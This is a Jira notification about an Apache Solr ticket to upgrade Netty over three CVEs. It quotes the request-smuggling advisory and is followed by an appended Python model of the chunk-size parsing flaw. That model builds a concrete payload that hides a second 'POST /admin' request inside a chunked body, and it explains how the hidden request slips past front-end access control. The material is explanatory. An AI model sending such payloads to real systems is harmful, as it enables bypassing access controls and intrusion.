[ https://issues.apache.org/jira/browse/SOLR-17922?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18082696#comment-18082696 ]

Jalaz Kumar edited comment on SOLR-17922 at 5/21/26 9:05 PM:
-------------------------------------------------------------

[~dsmiley] Is this a valid issue? I can raise a PR if this is required to be
closed, or do we rely upon solrbot to close this?

Saw a previous PR: [https://github.com/apache/solr/pull/2702] that was
raised by solrbot ~2 years back, thus curious.


was (Author: JIRAUSER311120):
[~dsmiley] Is this a valid issue? I can raise a PR if this is required to be done,
or do we rely upon solrbot to close this?

Saw a previous PR: https://github.com/apache/solr/pull/2702 that was raised
by solrbot ~2 years back, thus curious.

> Upgrade Netty jar to fix CVE-2025-58057, CVE-2025-58056, CVE-2025-24970
> -----------------------------------------------------------------------
>
>                 Key: SOLR-17922
>                 URL: https://issues.apache.org/jira/browse/SOLR-17922
>             Project: Solr
>          Issue Type: Improvement
>    Affects Versions: 9.8.1, 9.9.0
>            Reporter: Dhoka Pramod
>            Priority: Major
>
> CVE IDs: CVE-2025-58057, CVE-2025-58056, CVE-2025-24970
> Affected Solr versions: 9.8.x, 9.9.0
> Vulnerable dependency: Netty 4.1.114
> Impact: Netty is an asynchronous event-driven network application framework 
> for development of maintainable high performance protocol servers and 
> clients. In versions 4.1.124.Final, and 4.2.0.Alpha3 through 4.2.4.Final, 
> Netty incorrectly accepts standalone newline characters (LF) as a chunk-size 
> line terminator, regardless of a preceding carriage return (CR), instead of 
> requiring CRLF per HTTP/1.1 standards. When combined with reverse proxies 
> that parse LF differently (treating it as part of the chunk extension), 
> attackers can craft requests that the proxy sees as one request but Netty 
> processes as two, enabling request smuggling attacks. 
> Fix: This is fixed in versions 4.1.125.Final and 4.2.5.Final.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
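The chunk-size line discrepancy described in the quoted advisory, modelled as an added example (this is not Solr, Netty or proxy code, and nothing here is taken from the ticket). The same bytes are fed to three models of the chunk-size line parser: one where a bare LF ends the line (the behaviour the advisory attributes to the affected Netty versions), one where only CRLF ends the line and a bare LF is swallowed into the chunk extension (the front-end behaviour the advisory describes), and one where a bare LF is rejected (what the fixed versions require). The request parser, the hostnames and paths, and the payload bytes are constructed for illustration; the front-end model follows the advisory's one-sentence description and is not a model of any particular proxy.

```python
"""Chunk-size line terminator desync, modelled in Python.

Added example for the Netty advisory quoted in SOLR-17922; this is not Solr,
Netty or proxy code. Three models of the chunk-size line parser:

  "lf"     bare LF ends the line, CR optional (the behaviour the advisory
           attributes to the affected Netty versions)
  "ext"    only CRLF ends the line; a bare LF is swallowed as part of the
           chunk extension (the front-end behaviour the advisory describes)
  "strict" only CRLF ends the line; a bare LF is rejected (what the fixed
           versions require)

The request parser, hostnames, paths and payload bytes are constructed for
illustration.
"""


class Desync(Exception):
    """Raised when a parser model refuses the stream."""


def _chunk_size(line):
    """Leading hex digits are the size; anything after them is an extension."""
    i = 0
    while i < len(line) and chr(line[i]) in "0123456789abcdefABCDEF":
        i += 1
    if i == 0:
        raise Desync("missing chunk size")
    return int(line[:i], 16)


def _read_crlf_line(buf, pos):
    end = buf.index(b"\r\n", pos)
    return buf[pos:end], end + 2


def decode_chunked(buf, pos, mode):
    """Decode a chunked body starting at pos; return (body, pos after body)."""
    body = b""
    while True:
        if mode == "lf":
            end = buf.index(b"\n", pos)            # LF alone terminates the line
            line, pos = buf[pos:end].rstrip(b"\r"), end + 1
        else:
            line, pos = _read_crlf_line(buf, pos)  # CRLF required
            if mode == "strict" and b"\n" in line:
                raise Desync("bare LF in chunk-size line")
        size = _chunk_size(line)
        if size == 0:
            break
        body += buf[pos:pos + size]
        pos += size
        if buf[pos:pos + 2] != b"\r\n":
            raise Desync("chunk data not followed by CRLF")
        pos += 2
    while True:                                    # trailers end at an empty line
        line, pos = _read_crlf_line(buf, pos)
        if not line:
            return body, pos


def parse_requests(stream, mode):
    """Split a byte stream into (request_line, body) pairs."""
    requests, pos = [], 0
    while pos < len(stream):
        head_end = stream.index(b"\r\n\r\n", pos)
        request_line, *header_lines = stream[pos:head_end].decode("ascii").split("\r\n")
        headers = {}
        for h in header_lines:
            name, _, value = h.partition(":")
            headers[name.strip().lower()] = value.strip()
        pos = head_end + 4
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, pos = decode_chunked(stream, pos, mode)
        else:
            length = int(headers.get("content-length", "0"))
            body, pos = stream[pos:pos + length], pos + length
        requests.append((request_line, body))
    return requests


# Constructed attacker payload. The hidden request's Content-Length (7)
# exactly covers the trailing b"\r\n0\r\n\r\n", so a back-end that splits
# the stream sees two complete requests, while a front-end that reads the
# chunk-size line up to the first CRLF treats HIDDEN as ordinary chunk data.
SMUGGLED = b"POST /admin HTTP/1.1\r\nHost: solr\r\nContent-Length: 7\r\n\r\n"
HIDDEN = b"0\r\n\r\n" + SMUGGLED
FILLER = b"x" * len(HIDDEN)                 # no CR, LF or hex digits inside
BODY = (b"%x\n" % len(HIDDEN)               # chunk-size line ending in a bare LF
        + FILLER + b"\r\n" + HIDDEN + b"\r\n0\r\n\r\n")
STREAM = (b"POST /solr/update HTTP/1.1\r\nHost: solr\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n" + BODY)


def compare(stream=STREAM):
    """Request lines each parser model extracts from the same bytes."""
    result = {}
    for mode in ("ext", "lf", "strict"):
        try:
            result[mode] = [line for line, _ in parse_requests(stream, mode)]
        except Desync as exc:
            result[mode] = "rejected: %s" % exc
    return result


if __name__ == "__main__":
    for mode, seen in compare().items():
        print(mode, "->", seen)
```

Running it shows the front-end model ("ext") returning a single request whose body is the HIDDEN bytes, the affected-Netty model ("lf") returning two requests with the second one being the hidden POST to /admin, and the fixed model ("strict") refusing the stream outright. The point for a deployment is the disagreement between the two parsers that survive: whatever access control or logging the front end applies to the first request never sees the second one.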
